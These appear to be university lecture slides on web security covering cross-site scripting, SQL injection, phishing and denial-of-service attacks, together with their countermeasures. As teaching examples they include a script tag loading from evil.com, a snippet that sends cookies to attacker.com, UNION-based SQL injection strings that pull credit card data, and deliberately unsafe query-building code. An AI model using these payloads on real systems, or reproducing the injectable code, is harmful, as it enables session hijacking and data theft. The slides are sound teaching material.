# Other Attacks[^1]

# Code Injection Attacks

## Consider adding HTML comments to our Photo App

- Easy change:

Rather than `{model.comment}` do `div.innerHtml = model.comment;`

- What happens if someone inputs a comment with a script tag?

```html
<script src="http://www.evil.com/damage.js" />
```

- Called a Cross Site Scripting Attack (XSS)

Really unfortunate for us. Every user that views that photo/comments gets hurt. (consider following with a CSRF attack)

## Stored Cross Site Scripting Attack

- Attacker stores attacking code in a victim Web server, where it gets accessed by victim clients. Call a **Stored Cross Site Scripting Attack**

- On previous generations of web frameworks was a major attack loophole
  - Lots of stuffing things into innerHTML, bad escape processing

- Less so on JavaScript frameworks
  - Care is taken before stuffing things into the DOM

## Reflected Cross Site Scripting

- Attacker doesn't need to store attack on website, can just reflect it off the website. Call a Reflected Cross Site Scripting Attack

- Consider a website that shows the search term used (like our states view)
  - What happens if we store the search term in an innerHTML and an attacker tricks a user into

searching for: Justin Bieber

```html
<img style="display:none" id="cookieMonster">
<script>
    img = document.getElementById("cookieMonster");
    img.src = "http://attacker.com?cookie=" +
</script>
```

## Reflected Cross Site Scripting Attack

- How to get user to submit that URL?
 
CSRF again:

- Step #1: lure user to attacker site:
  - Sponsored advertisement
  - Spam email
  - Facebook application

- Step #2: attacker HTML automatically loads the link in an invisible iframe 


## Modern JavaScript frameworks have better defences

- Angular bind-html - Sanitizes HTML to remove script, etc. 

```html
<div ng-bind-html="model.comment"></div> <!-- Safe -->
```

- Must explicitly tell Angular if you don't want it sanitized 

```js
model.comment = $sce.trustAsHtml(model.comment)
```

Strict Contextual Escaping (SCE)

- Effectively marks all the places you need to worry about

- ReactJS: No opinion -> half dozen options, search "reactjs sanitize html"

# Code Inject on the Server

## SQL DataBase query models

- Request processing for get students of a specified advisor

```js
var advisorName = routeParam.advisorName;
var students = Student.find_by_sql(
    "SELECT students.* " +
    "FROM students, advisors " +
    "WHERE student.advisor_id = advisor.id " +
    "AND advisor.name = '" + advisorName + "'");
```

- Called with advisorName of 'Jones'

```sql
SELECT students.* FROM students, advisors
    WHERE student.advisor_id = advisor.id
    AND advisor.name = 'Jones'
```

## SQL Injection Attack - Update database

- What happens if the advisorName is: Jones; 

```sql
UPDATE grades
SET g.grade = 4.0
FROM grades g, students s
WHERE g.student_id = s.id
AND s.name = 'Smith'
```

- The following query will be generated:

```sql
SELECT students.* FROM students, advisors
    WHERE student.advisor_id = advisor.id
    AND advisor.name = 'Jones'; UPDATE grades
    SET g.grade = 4.0
    FROM grades g, students s
    WHERE g.student_id = s.id
    AND s.name = 'Smith'
```

## SQL Injection

Injection can also be used to extract sensitive information

- Modify existing query to retrieve different information

- Stolen information appears in "normal" Web output

## Consider a simple pizza company view order history

### Order history query to SQL database

- Order history request processing:

```js
 var month = routeParam.month;
 var orders = Orders.find_by_sql(
      "SELECT pizza, toppings, quantity, date " +
      "FROM orders " +
      "WHERE user_id=" + user_id +
      "AND order_month= '" + month + "'");
```

- Month parameter set to:

```sql
October' AND 1=0
UNION SELECT name as pizza, card_num as toppings,
    exp_mon as quantity, exp_year as date
FROM credit_cards WHERE name != '
```

### **SQL Injection - Dump the database

```sql
SELECT pizza, toppings, quantity, date
   FROM orders
   WHERE user_id=94412
   AND order_month='October' AND 1=0
UNION SELECT name as pizza, card_num as toppings,
   exp_mon as quantity, exp_year as date
   FROM credit_cards WHERE name != ''**
```

| Pizza    | Toppings            | Quantity | Date |
| -------- | ------------------- | -------- | ---- |
| John Doe | 3962 4081 3317 9011 | 11       | 2009 |
| Jane Doe | 7132 0315 9444 6123 | 4        | 2011 |
| ...      | ...                 | ...      | ...  |

## CardSystems hit by SQL injection attack

- CardSystems - Credit card payment processing company 

  SQL injection attack in June 2005 (internal - did in the company)

- The Attack:

  Credit card #s stored unencrypted

  263,000 credit card #s stolen from database

  43 million credit card #s exposeds

## Solutions

- Don't write SQL

```js
Student.findByAdvisorName(routeParam.advisorName);
```

- Use a framework that knows how to safely build sql commands:

```js
Student.find_by_sql("SELECT students.* " +
   "FROM students, advisors " +
   "WHERE student.advisor_id = advisor.id " +
   "AND advisor.name = ?", routeParam.advisorName);
```

# Phishing Attacks

- Basic idea:

  - Get unsuspecting users to visit an evil Web site

  - Convince them that the evil Web site is actually a legitimate site (such as a bank or PayPal)

  - Trick the user into disclosing personal information (password, credit card number, etc.)

  - Use the personal information for evil purposes such as identity theft.

- How to attract users?
  
## Spoofing Legitimate Emails and Web Sites

How to spoof the legitimate site?

- Copy HTML

- Include images from legitimate Web site

- Many links refer back to the legitimate Web site

- After collecting login info, log user into legitimate site, redirect to legitimate site

- User has no idea that password has been stolen

## Illegitimate Observations

How to spot an illegitimate email/website?

- URL obviously illegitimate

- Subtle difference that transposes letters or uses look-alike characters

  - `www.appel.com`
  - `www.ápple.com`

- Picture of legitimate website on illegitimate website

- Even legitimate websites can seem illegitimate

## International Character Sets

- What does this URL refer to:

www.bank.com/accounts/login.php?q=me.badguy.cn

Chinese characters that look like "/", "?", and "="

- This is a host name only!

## Counter-measure: visual indicators

- Help users identify legitimate sites:

- Lock symbols to indicate HTTPS
  - Color change to indicate HTTPS

Problems:

- Lock symbols not always obvious

## HTTPS Indicators

- mail.google.com
- web.stanford.edu
- blog.mozilla.org
- www.nytimes.com


## Problem: too easy to obtain certificates that look like legitimate sites

- Example: bankofamerica-secure.com

- Pressure on certificate authorities to issue certificates quickly

- E.g. "domain validation only" certificates: certificate authority only verifies that applicant has right to a particular Internet domain name; no verification of legal status of organization.

## Counter-measure: extended validation certificates
- Goal: prevent attackers from obtaining certificates that look like legitimate sites

- Certificate authority must thoroughly vet the organization obtaining the certificate; prevent look-alike names.

- Certificate authority must undergo audits to ensure it is doing the vets carefully.

- Browser provides special indicator for extended validation sites

- Problems:
  - Small organizations don't like delays and cost of extended validation
  - Browsers are getting rid of indication of HTTPS (including extended) since everything has it.

## Extended Validation Certificates 2018 vs Today

Details of ev certs availble when reviewing details about the cert but UI cue in the broswer bar has been removed from most browsers.

## Other counter-measures:

- Browsers starting to include anti-phishing measures (warn users about known phishing sites)

- Legitimate Web sites can monitor traffic; changes may indicate attacks under way:
  - Spike in download rates for official images
  - Unusual rate of password changes, funds transfers

- Legitimate sites can incorporate personal information in emails to authenticate them: phishers won't have such information.
  - Spear phishing - Phishing with attacker having personal information

## Other issues

- Legitimate Web sites often use deceptive techniques to get users to click through ("your last chance for ..."), which reduces distinction between honest and dishonest sites.

- Education ineffective against phishing: response rates to phishing e-mails comparable to those for "legitimate" commercial e-mail.

- Warnings about shady certificates are ineffective: people just click through.

## Two examples in the news

- Snapchat divulged employee information in phishing attack
  - “Last Friday, Snapchat’s payroll department was targeted by an isolated email phishing scam in which a scammer impersonated our Chief Executive Officer and asked for employee payroll information, ...

- Stanford staff member and student got an email with a Word doc they opened
  - Word doc contained a macro that encrypted the user's home directory and provided instruction how how to buy the encryption key. (Ransomware)

# Denial of Service (DoS) Attacks

## Denial of Service Attacks (DOS Attacks)

- An attack that causes a service to fail by using up resources 
  - Could be an accident (e.g. upload too big of a file) or on purpose

- Example from our Photo App:
  - User uploads photos, comments, user registration until our storage fills.
  - Establish so many connections our web server falls over

- Resource could be at networking layer
  - Use all the bandwidth of the network coming into our website
  - Use all the network sockets

## Distributed Denial of Service (DDoS) Attacks 

- DOS attack that uses many attacking machines
  - Example: Get control of a million machines and point them at someone's web server

- Botnets - Collection of compromised machines under control

- Has become an extortion business

## Web App DOS mitigation

- None perfect - really hard problem
  - Do want to take steps to avoid accidental DOS and make purpose-driven DOS harder
  - Abuse analysis step required

- Resource quotas
  - Track resource consumption per user and provide way of cutting off users
  - Good for catching accidents, less so for malicious attacks

- Make resources cost money
  - Raises the cost or hassle for an attacker
  - Not always possible under business model

- Network layer: Need to push back on attack stream
  - Do things like cut off traffic coming from some part of the internet

[^1]: [Stanford Computer Science](https://cs.stanford.edu)
